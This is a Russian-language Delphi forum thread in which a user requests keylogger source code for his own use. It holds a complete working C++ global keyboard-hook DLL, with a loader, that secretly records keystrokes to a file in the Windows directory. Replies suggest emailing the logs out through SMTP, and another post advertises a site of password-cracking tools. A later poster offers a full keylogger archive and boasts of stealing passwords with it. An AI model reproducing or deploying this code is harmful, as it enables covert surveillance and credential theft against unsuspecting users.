Нужны исходники кейлоггера на Delphi

Тема в разделе "Delphi - Система", создана пользователем buts, 11 мар 2005.

Статус темы:
Закрыта.
  1. buts

    buts Гость

    Репутация:
    0
    люди, дайте исходников кейлогеров на Delphi
    а то чужими пользовать не хочу, хочу под себе сделать
     
  2. Artexoid

    Artexoid Гость

    Репутация:
    0
    Что такое Кейлогеры ?))
     
  3. Barmutik

    Barmutik Гость

    Репутация:
    0
    Хороший правильный кейлогер никтотак не выложит .. исходники простейших есть на www.torry.net иил смотри
    функцию SetWindowHookEx

    Artexoid
    Кейлоггер -программа отслеживающая нажатия всех клавиш и сохраняющая для дальнейшего анализа.
     
  4. admin

    admin Well-Known Member

    Репутация:
    0
    Регистрация:
    8 авг 2003
    Сообщения:
    2.754
    Симпатии:
    1
    Artexoid
    delphiworld.narod.ru
    там может быть вполне такое
     
  5. Artexoid

    Artexoid Гость

    Репутация:
    0
    Barmutik
    Серёга
    Во спасибо ра разъеснение :(. Я тут с вами умней стану !!!
    Классный форум !!!!
     
  6. Boralnd

    Boralnd Гость

    Репутация:
    0
    Если будешь писать на Дельфе - неплохо сделать еще и поддержку пересылки данных по почте через TidSMTP.
    Для удаленного юзания))
     
  7. buts

    buts Гость

    Репутация:
    0
    Boralnd
    Это я уже нашел, написал
    уже удаленно врубаю\вырубыю процессы
    а вот терь логер хочу написать
     
  8. Oleg

    Oleg Гость

    Репутация:
    0
    Имеется DBF-таблица в которой один столбец это время в секундах, с начала отчетного периода
    требуется перевести секунды в формат чч:мм:сс. Процедура для перевода есть.
    А вот как присвоить эту процедуру всему столбцу незнаю.
    Если кто знает, помогите. За ранее благодарен
     
  9. Гость

    Репутация:
    0
    www.vzlom08.narod.ru Программы для программы для взлома ICQ, для взлома e-mail.для взлома паролей Lineage2, кейлогер.
     
  10. Dottik

    Dottik Гость

    Репутация:
    0
    Нлобальный перехват клавиш необходимо организовать через длл:
    Вот один из возможных вариантов реализации:

    [codebox]#include <windows.h>
    #include <shlobj.h>
    #include <stdlib.h>
    #include <stdio.h>

    LRESULT CALLBACK KbdHook(int code,WPARAM wParam,LPARAM lParam);

    inline bool BIT30(LPARAM val)
    {
    return val&0x40000000;
    }

    int VkToChar(UINT vk,LPWORD ret)
    {
    char kb[256];
    GetKeyboardState((PBYTE)kb);
    return ToAscii(vk,
    0,
    (PBYTE)kb,
    ret,
    0);
    }

    inline DWORD WriteToFile(HANDLE hFile,void *data,int len)
    {
    DWORD wr;
    WriteFile(hFile,
    data,
    len,
    &wr,
    NULL);
    return wr;
    }

    HHOOK hhk;
    HINSTANCE hInst;
    char WindowsFolder[MAX_PATH];

    extern "C" __declspec(dllexport) bool SetHook(bool Set);

    BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
    {
    GetWindowsDirectory(WindowsFolder, MAX_PATH);
    hInst = (HINSTANCE)hModule;
    return TRUE;
    }

    bool SetHook(bool Set)
    {
    if(Set)
    {
    hhk = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KbdHook,hInst,0);

    if(!hhk)return
    false;
    return true;
    }
    else
    {
    UnhookWindowsHookEx(hhk);
    return true;
    }
    }

    LRESULT CALLBACK KbdHook(int code,WPARAM wParam,LPARAM lParam)
    {
    HANDLE hFile;

    if(code==HC_ACTION)
    {
    //30uj bit = 1 , jakwo natuskajyt`, = 0 jakwo vidpyskajyt`
    if(BIT30(lParam))
    {
    WORD ret;
    if(VkToChar(wParam,&ret))
    {
    char cWrite[32];
    char key = ret;
    char bufStr[MAX_PATH]; // path to file
    sprintf(bufStr,"%s\\%s",WindowsFolder,"klava.txt");
    //probyjemo vidkrutu isnyjychuj file
    hFile = CreateFile(bufStr,
    GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ,
    NULL,
    CREATE_NEW,
    FILE_ATTRIBUTE_NORMAL,
    NULL);
    // jakwo ne isnyje, bacajemo novuj
    if(hFile==INVALID_HANDLE_VALUE)
    {
    hFile = CreateFile(bufStr,
    GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL);
    //jakwo ne vujwlo novuj , pracyjemo dali bez zapusy :)
    if(hFile==INVALID_HANDLE_VALUE)
    {
    return CallNextHookEx(hhk,code,wParam,lParam);
    }
    }
    SetFilePointer(hFile,NULL,NULL,FILE_END);
    switch(key)
    {
    case 13://ENT
    cWrite[0] = 'E';
    cWrite[1] = 'N';
    cWrite[2] = 'T';
    cWrite[3] = 'E';
    cWrite[4] = 'R';
    cWrite[5] = 0;
    break;
    case 8://BSP
    cWrite[0] = 'B';
    cWrite[1] = 'S';
    cWrite[2] = 'P';
    cWrite[3] = 'A';
    cWrite[4] = 'C';
    cWrite[5] = 'E';
    cWrite[6] = 0;
    break;
    case 27://ESC
    cWrite[0] = 'E';
    cWrite[1] = 'S';
    cWrite[2] = 'C';
    cWrite[3] = 'A';
    cWrite[4] = 'P';
    cWrite[5] = 'E';
    cWrite[6] = 0;
    break;
    default:
    cWrite[0] = key;
    cWrite[1] = 0;
    break;
    }
    WriteToFile(hFile,cWrite,strlen(cWrite));
    CloseHandle(hFile);
    }
    }
    }
    return CallNextHookEx(hhk,code,wParam,lParam) ;
    }


    Программа для загрузки длл:
    #include <WINDOWS.H>
    typedef bool (*SETHOOK)(bool);
    int WINAPI WinMain(HINSTANCE hInst,HINSTANCE,LPSTR,int)
    {
    HANDLE hMutex = OpenMutex(MUTEX_ALL_ACCESS,FALSE,"klava.txt.OneInstance");
    if(!hMutex)
    {
    hMutex = CreateMutex(NULL,TRUE,"klava.txt.OneInstance");
    }
    else
    return 0;
    HINSTANCE hDll;
    hDll = LoadLibrary("w32_kl_srv.dll");
    if(!hDll)
    return 0;
    MSG msg;
    SETHOOK sh;
    sh = (SETHOOK)GetProcAddress(hDll,"SetHook");
    if(sh)
    {
    sh(true);
    }
    while(GetMessage(&msg,0,0,0))
    {
    TranslateMessage(&msg);
    DispatchMessage(&msg);
    }
    if(sh)sh(false);
    return 0;
    }[/codebox]
     
  11. Coldfate

    Coldfate Гость

    Репутация:
    0
    Если кому нужно, пишите сюда мыла (или прямо на coldfate@yandex.ru) - вышлю полный исходник dll-ловушки для кейлоггера с указанием, как пользоваться и прочими аддонами вроде сервиса. Прога проверена - таким способам я таскаю пароли на интернет. :D
     
  12. Coldfate

    Coldfate Гость

    Репутация:
    0
    Ура! Я понял, как присоединять файлы!! Теперь Вы просто можете скачать файлы отсюда (если ещё нужно; по-моему, тема уже бородой обросла!). Я убрал все exe, чтобы не мучить форум, поэтому компилируйте все dpr-ки, которые найдёте. И прочитайте файл README.HTM!!!!!!!
     

    Вложения:

    • tkserv.rar
      Размер файла:
      346,4 КБ
      Просмотров:
      449
Загрузка...
Статус темы:
Закрыта.

Поделиться этой страницей